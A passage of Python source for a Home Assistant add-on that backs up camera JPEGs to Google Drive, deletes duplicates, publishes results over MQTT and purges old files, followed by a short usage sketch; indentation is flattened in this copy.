with open(TOKEN) as f:
creds = json.load(f)
credentials = GoogleCredentials(None,creds["client_id"],creds["client_secret"],
creds["refresh_token"],None,"https://accounts.google.com/o/oauth2/token",user_agent)
http = credentials.authorize(Http())
credentials.refresh(http)
drive_service = build('drive', 'v3', http)
return drive_service
def alreadyBackedUp(fileName, backupDirID, drive_service):
shortFileName = ntpath.basename(fileName)
# Search for given file in Google Drive Directory
results = drive_service.files().list(
q="name='" + shortFileName + "' and '" + backupDirID + "' in parents and trashed = false",
spaces='drive',
fields="files(id, name)").execute()
items = results.get('files', [])
return len(items) > 0
def deleteIfThere(fileName, backupDirID, drive_service):
shortFileName = ntpath.basename(fileName)
logging.debug("Will delete " + shortFileName + " if it is already in Google Drive.")
# Search for given file in Google Drive Directory
results = drive_service.files().list(
q="name='" + shortFileName + "' and '" + backupDirID + "' in parents and trashed = false",
spaces='drive',
fields="files(id, name)").execute()
items = results.get('files', [])
logging.debug("Found " + str(len(items)) + " files named " + shortFileName + " in Google Drive.")
deletedCount = 0
for file in items:
drive_service.files().delete(fileId=file.get('id')).execute()
deletedCount += 1
logging.info("Deleted " + file.get('name') + " : " + file.get('id'))
logging.info("Deleted " + str(deletedCount) + " files named " + shortFileName + " from Google Drive.")
return deletedCount
def backupFile(fileName, backupDirID, drive_service, MIMETYPE, TITLE, DESCRIPTION):
logging.info("Backing up " + fileName + " to " + backupDirID)
logging.debug("drive_service = " + str(drive_service))
logging.debug("MIMETYPE = " + MIMETYPE)
logging.debug("TITLE = " + TITLE)
logging.debug("DESCRIPTION = " + DESCRIPTION)
shortFileName = ntpath.basename(fileName)
media_body = googleapiclient.http.MediaFileUpload(
fileName,
        mimetype=MIMETYPE,  # honour the caller-supplied MIME type instead of hard-coding JPEG
resumable=True
)
logging.debug("media_body: " + str(media_body))
body = {
'name': shortFileName,
'title': TITLE,
'description': DESCRIPTION,
'parents': [backupDirID]
}
new_file = drive_service.files().create(
body=body, media_body=media_body).execute()
logging.debug(pformat(new_file))
def publishResult(result):
url = settings.HA_MQTT_PUBLISH_URL
data = {"payload" : json.dumps(result),
"topic" : settings.HA_MQTT_RESULT_TOPIC,
"retain" : settings.HA_MQTT_RESULT_RETAIN}
data_json = json.dumps(data)
headers = {'Content-type': 'application/json',
'Authorization': 'Bearer ' + settings.HA_TOKEN}
response = requests.post(url, data=data_json, headers=headers)
logging.debug(pformat(response))
def publishAdhocResult(result):
url = settings.HA_MQTT_PUBLISH_URL
data = {"payload" : json.dumps(result),
"topic" : settings.HA_MQTT_ADHOC_RESULT_TOPIC,
"retain" : settings.HA_MQTT_ADHOC_RESULT_RETAIN}
data_json = json.dumps(data)
headers = {'Content-type': 'application/json',
'Authorization': 'Bearer ' + settings.HA_TOKEN}
response = requests.post(url, data=data_json, headers=headers)
logging.debug(pformat(response))
def adhocBackupFiles(fromPatterns, backupDirID, user_agent):
logging.debug("Adhoc backup fromPatterns: " + str(fromPatterns))
logging.debug("Adhoc backup backupDirID: " + backupDirID)
logging.debug("Adhoc backup user_agent: " + user_agent)
backupTimestamp = datetime.datetime.now().isoformat()
drive_service = getDriveService(user_agent)
copyCount = 0
newCount = 0
replacedCount = 0
filesToCopy = []
for fromPattern in fromPatterns:
globResult = glob.glob(fromPattern)
logging.debug("glob of " + fromPattern + " returned " + str(globResult))
filesToCopy.extend(globResult)
logging.debug("Files to copy: " + str(filesToCopy))
for file in filesToCopy:
file_size = os.path.getsize(file)
if file_size == 0:
raise Exception("The file, " + file + " is empty. This application cannot copy empty (size = 0) files to Google Drive.")
matchesFound = deleteIfThere(file, backupDirID, drive_service)
if matchesFound == 0:
newCount += 1
else:
replacedCount += matchesFound
shortFileName = ntpath.basename(file)
MIMETYPE = "image/jpeg"
TITLE = shortFileName
DESCRIPTION = 'Backup from hassio of ' + file
backupFile(file, backupDirID, drive_service, MIMETYPE, TITLE, DESCRIPTION)
copyCount += 1
result = {'adhocBackupTimestamp': backupTimestamp,
'fromPatterns': fromPatterns,
'backupDirID': backupDirID,
'copyCount': copyCount,
'newCount': newCount,
'replacedCount': replacedCount}
return result
def backupFiles(fromPattern, backupDirID, user_agent):
logging.debug("backup fromPattern: " + fromPattern)
logging.debug("backup backupDirID: " + backupDirID)
logging.debug("backup user_agent: " + user_agent)
backupTimestamp = datetime.datetime.now().isoformat()
drive_service = getDriveService(user_agent)
fileCount = 0
alreadyCount = 0
backedUpCount = 0
for file in glob.glob(fromPattern):
fileCount += 1
file_size = os.path.getsize(file)
if file_size == 0:
raise Exception("The file, " + file + " is empty. This application cannot copy empty (size = 0) files to Google Drive.")
if alreadyBackedUp(file, backupDirID, drive_service):
alreadyCount += 1
else:
# Metadata about the file.
            # This application currently only handles JPEG images.
MIMETYPE = 'image/jpeg'
TITLE = 'Kamera'
DESCRIPTION = 'adHoc Sync'
backupFile(file, backupDirID, drive_service, MIMETYPE, TITLE, DESCRIPTION)
backedUpCount += 1
result = {'backupTimestamp': backupTimestamp,
'fromPattern': fromPattern,
'backupDirID': backupDirID,
'fileCount': fileCount,
'alreadyCount': alreadyCount,
'backedUpCount': backedUpCount}
return result
def purgeOldFiles(fromPattern, preserve):
logging.info("Beginning purge process...")
logging.debug("fromPattern = " + fromPattern)
logging.debug("preserve = " + str(preserve))
sourceFiles = sorted(glob.glob(fromPattern), key=os.path.getmtime)
numSourceFiles = len(sourceFiles)
deletedCount = 0
if numSourceFiles > preserve:
numToDelete = numSourceFiles - preserve
filesToDelete = sourceFiles[:numToDelete]
for file in filesToDelete:
os.remove(file)
deletedCount += 1
logging.info("Deleted " + os.path.basename(file))
else:
logging.info("Nothing to purge")
return deletedCount
def purgeOldGoogleFiles(backupDirID, preserve, user_agent):
logging.info("Beginning purge Google Drive process...")
logging.debug("backupDirID = " + backupDirID)
logging.debug("preserve = " + str(preserve))
drive_service = getDriveService(user_agent)
# Search for all files in Google Drive Directory
items = []
token = None
results = None
while True:
if (results is not None and token is None):
break
results = drive_service.files().list(
q="'" + backupDirID + "' in parents and trashed = false",
spaces='drive',
orderBy='modifiedTime',
pageToken=token,
fields="nextPageToken, files(id, name)").execute()
token = results.get('nextPageToken')
items.extend(results.get('files', []))
numSourceFiles = len(items)
logging.debug("Found " + str(numSourceFiles) + " files in Google Drive folder.")
deletedCount = 0
if numSourceFiles > preserve:
numToDelete = numSourceFiles - preserve
filesToDelete = items[:numToDelete]
for file in filesToDelete:
drive_service.files().delete(fileId=file.get('id')).execute()
deletedCount += 1
logging.info("Deleted " + file.get('name') + " : " + file.get('id'))
else:
logging.info("Nothing to purge from Google Drive")
return deletedCount
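A hedged driver sketch for the module above (not part of the source): it assumes the Django settings, client_secret.json and a previously stored token.json are already in place, and the Drive folder ID, glob pattern and user agent below are placeholders.

from hassiogooglebackup.googlebackup import gbcommon

result = gbcommon.backupFiles(
    fromPattern="/share/camera/*.jpg",             # assumed local snapshot directory
    backupDirID="0B_placeholder_drive_folder_id",  # assumed Google Drive folder ID
    user_agent="hassio-google-backup/1.0",
)
gbcommon.publishResult(result)                      # push the summary to MQTT via Home Assistant
gbcommon.purgeOldFiles("/share/camera/*.jpg", preserve=50)   # keep only the newest 50 local files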
avg_line_length: 34.421687 | max_line_length: 132 | alphanum_fraction: 0.659608
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.